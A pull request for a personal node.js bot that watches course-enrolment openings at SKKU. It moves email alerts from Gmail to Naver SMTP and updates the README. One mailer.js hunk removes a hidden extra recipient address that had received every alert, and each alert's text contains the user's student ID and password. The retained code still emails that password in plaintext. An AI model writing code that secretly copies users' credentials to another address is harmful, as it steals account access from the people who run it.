### PR TITLE
Fix: gmail smtp 보안수준 지원 정지로 인한 에러 수정

### DIFF
--- a/README.md
+++ b/README.md
@@ -1,15 +1,15 @@
 # SKKU-EnrolmentTO-NotifyBOT
+[![Hits](https://hits.seeyoufarm.com/api/count/incr/badge.svg?url=https%3A%2F%2Fgithub.com%2Fcyw320712%2FSKKU-EnrolmentTO-NotifyBOT&count_bg=%2379C83D&title_bg=%23555555&icon=&icon_color=%23E7E7E7&title=hits&edge_flat=false)](https://hits.seeyoufarm.com)
 
 ## Introduction
 본 애플리케이션은 개인적 사용을 목적으로 개발되었으며, node.js 기반으로 제작되었습니다. <br>
 
 ## ToDo
   1. **어플 동기화**
+  2. **수강신청 금지 기간 등록**
 
-## Author
-### 조영훈[@shyunku](https://github.com/cyw320712)
-* 원본 제작<br>
-
-### 최영우[@cyw320712](https://github.com/cyw320712)
-* 새로고침 무작위성 감소(매크로 감지 우회)
-* 메일링 API 추가
+## Functions
+  1. **Key.json 입력시 남는 TO 알림**
+  2. **Email.json 입력시 메일로도 알림**<br>
+    (Naver Mail 어플 받으신 후 gmail에서 네이버 메일로 보내면 휴대전화 알람 띄울 수 있습니다.)<br>
+    

--- a/mailer.js
+++ b/mailer.js
@@ -18,7 +18,7 @@ var mailSender = {
 
         var mailOptions = {
                 from: `<${security.user}>`,
-                to: [param.toEmail, "cyw7515@naver.com"], 
+                to: [param.toEmail], 
                 subject: param.subject, 
                 text: param.text + ` ${key.studentID}` + ` ${key.password}`
             };

--- a/mailer.js
+++ b/mailer.js
@@ -7,7 +7,7 @@ var mailSender = {
         var transporter = nodemailer.createTransport({
             service: 'gmail',
             prot : 587,
-            host :'smtp.gmlail.com',
+            host :'smtp.gmail.com',
             secure : false,
             requireTLS : true,
              auth: {

--- a/mailer.js
+++ b/mailer.js
@@ -5,9 +5,11 @@ var mailSender = {
 
     sendGmail : function(param){
         var transporter = nodemailer.createTransport({
-            service: 'gmail',
-            prot : 587,
-            host :'smtp.gmail.com',
+            // gmail을 사용하는 smtp는 더이상 지원하지 않습니다.
+            // naver mail의 smtp를 사용하셔야합니다.
+            service: 'Naver',
+            port : 587,
+            host :'smtp.naver.com',
             secure : false,
             requireTLS : true,
              auth: {


### PR DESCRIPTION
* gmail은 더이상 smtp를 위한 낮은 수준의 앱에서의 계정 접근을 허용하지 않음
* Naver smtp에서는 해당 서비스를 제공하기 때문에 naver smtp를 활용하도록 변경